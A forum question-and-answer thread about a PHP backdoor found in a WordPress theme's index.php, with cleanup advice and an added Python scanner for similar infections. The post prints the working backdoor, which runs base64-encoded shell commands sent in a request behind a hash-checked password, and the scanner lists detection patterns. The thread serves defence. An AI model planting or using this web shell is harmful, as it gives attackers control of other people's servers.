Malware
RigidStyle, 2018-12-05 14:59:34

What is this virus, and what is there to be afraid of now?

Today I found this thing on a WordPress site:
File address: wp-content/themes/index.php
The file had this code:

<?php
// Silence is golden.

$s=explode(":","6732fc3453c34f00be5bffc4f0dc2bcbdb1fea50:plugin:_lg");$q=$_REQUEST;if (sha1(md5($q[$s[1]]))===$s[0]){if (isset($q[$s[2]])){$l=base64_decode($q[$s[2]]);echo `$l`;}}

The first two lines are clear. But the last one was already on line 140. And it’s not clear what it does and where it could crawl through.
The malicious code was deleted, the file was replaced with a normal one. But what is there to fear now? Where could this thing go and what could it do there?
The host's antivirus identified it as:
SL-PHP-EVAL_REQUEST-awgh.UNOFFICIAL FOUND


1 answer(s)
Vitaliy Orlov, 2018-12-05
@orlov0562

Fear that there is another backdoor somewhere in another file.
It could get into any file in your working directory that is reachable from the script and where you have write permissions.
The best way to clean it up is to download the latest version of WP and transfer only the database, and preferably only the WP posts from the database. Wipe everything to zero and re-upload the latest version of the site. This is not always applicable, but it gives the best results. Otherwise, you need to overwrite the WP files with the latest version and look for other infected files by searching for masks taken from the infected script, for example "sha1(md5(" or "base64_decode($q".
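
The file search suggested in the answer, written out as an added example that is not part of the original thread: a Python scanner that walks a site directory and reports PHP files matching whitespace-tolerant forms of the two masks, the other traits visible in the posted one-liner, and any code inside a "Silence is golden" stub file. The signature labels, the extension list and the stub check are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Whitespace-tolerant forms of the masks from the answer, plus two more traits
# of the posted one-liner. Labels are this example's own, not antivirus names.
SIGNATURES = {
    "sha1(md5( password gate": re.compile(r"sha1\s*\(\s*md5\s*\(", re.I),
    "base64_decode of a variable": re.compile(r"base64_decode\s*\(\s*\$", re.I),
    "backtick shell execution": re.compile(r"(?:echo|print|return|=)\s*`[^`\n]*\$[^`\n]*`", re.I),
    "request array copied to a variable": re.compile(r"\$\w+\s*=\s*\$_(?:REQUEST|POST|GET|COOKIE)\s*;"),
}
PHP_SUFFIXES = {".php", ".phtml", ".inc"}  # assumed list, extend as needed

def stub_has_extra_code(text):
    # A WordPress "Silence is golden" index.php holds only the tag and a comment,
    # so anything left after stripping those (even 140 lines down) is suspect.
    if "Silence is golden" not in text:
        return False
    rest = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    rest = re.sub(r"(?m)(//|#).*$", "", rest)
    rest = re.sub(r"<\?php|\?>", "", rest)
    return bool(rest.strip())

def scan_file(path):
    """Return a list of (line number, label); line 0 marks a whole-file finding."""
    text = path.read_text(encoding="utf-8", errors="replace")
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, rx in SIGNATURES.items():
            if rx.search(line):
                hits.append((lineno, label))
    if stub_has_extra_code(text):
        hits.append((0, "code in 'Silence is golden' stub"))
    return hits

def scan_tree(root):
    """Map each flagged file under root to its findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            hits = scan_file(path)
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for lineno, label in hits:
            print(f"{name}:{lineno}: {label}")
```

Hits are leads for manual review: legitimate plugins also call base64_decode on variables, so a file matching several signatures at once deserves attention first.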
